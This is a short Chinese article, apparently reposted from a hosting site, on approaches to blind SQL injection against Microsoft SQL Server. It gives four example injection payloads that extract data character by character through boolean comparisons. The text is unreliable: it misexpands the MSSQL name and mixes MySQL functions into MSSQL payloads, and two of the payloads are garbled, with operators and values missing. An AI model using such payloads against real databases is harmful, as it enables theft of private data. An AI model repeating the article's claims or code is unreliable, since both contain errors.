黑客利用MSSQL盲注语句攻击常见思路

MSSQL(Microsoft Structured Query Language)是Microsoft公司推出的一种关系型数据库管理系统，是服务器端脚本的查询语言，常被黑客用于建立攻击平台，也是黑客进行SQL攻击的重要手段之一。

MSSQL盲注语句攻击是利用SQL语句对MSSQL数据库进行攻击的一种手段，其中盲注是指不采取明文的攻击方式，而是通过判断条件的布尔值结合而构成攻击，MSSQL盲注语句攻击的重要目标是为取得服务器上存储的私有信息，攻击原理是利用普通用户无权访问系统数据库中私有信息时，通过构造特定SQL语句，实现从数据库中“盲”获得系统中的私有信息，从而到达“有眼而瞎”的效果，而且不会产生报警信息。

MSSQL盲注语句攻击的常见思路主要有以下几种：

1. 根据数字类型区别范围比较进行盲注，以下例：

select * from user where id = 0 and 1 =/*此处为备注*/ case when （select ascii(substring(user,1,1)) from user where id=0） > 96 then 1 else 0 end

2.根据字符出现次数区别进行盲注，以下例：

select * from user where id = 0 and 1 =/*此处为备注*/ case when (select count(1) from user where id=0 and ascii(substring(user,1,1))>96)>0 then 1 else 0 end

3.利用if流程拆分比较条件，以下例：

select * from user where id = 0 and 1 =/*此处为备注*/ case when (select count(1) from user where id=0 and ascii(substring(user,1,1))>96 and if(ascii(substring(user,1,1))0 then 1 else 0 end

4.利用函数及比较符号两重拆分条件，以下例：

select * from user where id = 0 and 1 =/*此处为备注*/ case when (select count(1) from user where id=0 and mid(user,1,1)>char(96) and mid(user,1,1)0 then 1 else 0 end

以上就是黑客利用MSSQL盲注语句攻击常见思路，在MSSQL数据库信息安全中有侧重要的地位，因此及时的升级数据库版本，加强数据库管理，尽量采取安全措施，从源头避免黑客的入侵，尽量将攻击行动尽早的发现并及时报告，是保障信息安全的重要一环。

本文来源：https://www.yuntue.com/post/94494.html | 云服务器网，转载请注明出处！